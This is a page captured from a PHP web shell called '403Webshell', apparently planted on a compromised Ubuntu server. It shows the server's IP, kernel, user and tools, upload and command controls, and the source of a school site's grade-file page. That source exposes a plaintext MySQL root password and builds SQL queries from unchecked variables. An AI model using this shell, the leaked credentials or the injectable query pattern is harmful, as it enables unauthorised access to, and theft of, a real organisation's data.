403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/news/v.php
<html>
<head>
<?
include('confiteacher.inc.php');  //ไฟล์เชื่อมต่อกับ database ที่เราได้สร้างไว้ก่อนหน้าน
$teach=$objResult["teachcode"];
?>
<title>ThaiCreate.Com Tutorial</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<?php
	$objConnect = mysql_connect("localhost","root","gpaklw+3322") or die("Error Connect to Database");
	$objDB = mysql_select_db("klw");
	mysql_query("SET NAMES UTF8");
	$strSQL = "SELECT * FROM files where teachup='$teach'";
	$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");

	
?>



<center><? echo $namereport?></center><? echo $checkdel?>
<table width="100%" border="0" bgcolor="#999999">
<tr bgcolor="EEEEEE">
<th width="50"> <div align="center">dell</div></th>
<th width="50"> <div align="center">edit</div></th>
<th width="150"> <div align="center"><? echo $file?></div></th>
<th width="150"> <div align="center"><? echo $subject2?></div></th>
<th width="150"> <div align="center"><? echo $subject9?></div></th>

</tr>
<?php
	while($objResult = mysql_fetch_array($objQuery))
	{
		$report= $objResult["FilesName"];
		$fileID= $objResult["FilesID"];
		

		


if($bg == "#EEEEEE") { //ส่วนของการ สลับสี 
$bg = "#FFFFFF";
} else {
$bg = "#EEEEEE";
}
?>
<tr bgcolor="<?=$bg?>">
<td>

<? if($checkdel=='')
 {
   echo "<a href=delup.php?id=$objResult[FilesID]> <span style=\"color: AA0000;\">del</span>";
 }
 else if($checkdel!='')
 {
    echo "<span style=\"color: AA0000;\"></span>";
 }
?>					
</td>
<td><div align="center"><a href=index2.php?id=<?php echo $objResult["FilesID"];?>><img src=images/pencil.jpg width=22 height=22 border=0 alt=ลบข้อมูล></a></div>
</td>
<td><?php echo $objResult["dayup"];?></td>
<td><div align="center"></div></td>
<td><div align="center"></div></td>


</tr>
<?php
	}
?>
</table>
<?php
mysql_close($objConnect);
?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit